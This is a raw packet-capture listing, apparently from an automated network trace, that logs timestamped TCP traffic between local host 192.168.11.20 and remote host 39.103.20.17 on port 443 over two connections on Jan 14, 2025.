                                                                        Jan 14, 2025 05:11:09.053508043 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.053534031 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.053575993 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053576946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053576946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053576946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053605080 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.053868055 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053869009 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053924084 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053924084 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.053925991 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.053955078 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054131031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054131031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054131031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054131031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054131031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054183006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054209948 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054327965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054327965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054327965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054327965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054362059 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054397106 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054517984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054554939 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054586887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054708004 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054730892 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054763079 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054888010 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.054909945 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.054935932 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055084944 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055085897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055085897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055085897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055085897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055119038 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055160046 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055274963 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055274963 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055300951 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055341959 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055460930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055460930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055460930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055460930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055460930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055491924 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055522919 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055540085 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055633068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055633068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055651903 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055701971 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055821896 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055821896 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055821896 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055821896 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055823088 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.055845976 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055876017 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.055893898 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056011915 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056025982 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056062937 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056204081 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056204081 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056204081 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056225061 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056243896 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056314945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056339025 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056442022 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056508064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056509018 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056509018 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056509018 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056531906 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056550026 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056607962 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056644917 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056752920 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056799889 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056799889 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056799889 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056834936 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056900978 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.056925058 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.056947947 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057092905 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057094097 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057101011 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057121038 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057252884 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057276011 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057300091 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057425976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057425976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057425976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057425976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057425976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057460070 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057478905 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057594061 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057594061 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.057614088 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057652950 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.057826042 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058008909 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058105946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058147907 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058171988 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058186054 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058217049 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058273077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058329105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058439970 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.058465004 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058629036 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.058837891 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059012890 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059195995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059196949 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059238911 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059259892 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059274912 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059297085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059297085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059340000 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059340000 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059340000 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059365034 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059526920 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059547901 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059740067 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059741020 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.059753895 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.059942961 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060060024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060122967 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060122967 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060123920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060123920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060123920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060123920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060123920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060123920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060161114 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060178041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060209990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060209990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060209990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060226917 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060316086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060316086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060316086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060316086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060343981 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060376883 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060501099 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060501099 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060502052 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.060534000 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060575008 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060707092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060746908 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.060899019 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.061047077 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.061086893 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061088085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061140060 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061161041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.061252117 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061284065 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.061446905 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.061470032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.061649084 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.061839104 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062016964 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062016964 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062017918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062017918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062017918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062017918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062017918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062017918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062060118 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062062025 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062062025 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062087059 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062180042 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062200069 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062275887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062361002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062361002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062375069 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062550068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062550068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062550068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.062572002 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062741041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062846899 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.062906981 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063038111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063038111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063038111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063038111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063039064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063039064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063039064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063066006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063102961 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063199997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063199997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063218117 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063275099 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063394070 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063395023 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063415051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063445091 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063591003 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063615084 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063783884 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.063966990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063966990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063966990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063966990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063966990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063966990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063967943 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063967943 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.063998938 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064028978 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064049006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064146996 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.064146996 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.064166069 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064215899 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064340115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.064340115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.064341068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.064341068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.064361095 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064388990 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064404964 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064536095 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064574003 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064724922 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.064868927 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.065016985 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065083981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065146923 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065181017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:09.065181017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:12.758282900 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:12.763745070 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:14.205571890 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:14.205571890 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:14.205660105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:14.205681086 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:14.398893118 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:14.399002075 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:14.399200916 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:14.399425983 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:14.399477959 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.360696077 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.360937119 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.363593102 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.363889933 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.364973068 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.365044117 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.366082907 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.366803885 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.410509109 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.720302105 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.720355988 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.720459938 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.720602989 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.720658064 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.720679045 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.720679045 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.726389885 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.726748943 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.726828098 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.727154970 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.729336023 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.729650021 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.735542059 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.735882998 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.738795042 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.739136934 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.741950989 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.742191076 CET4434976039.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:15.742224932 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.742372036 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.742449045 CET49760443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:15.742449045 CET49760443192.168.11.2039.103.20.17
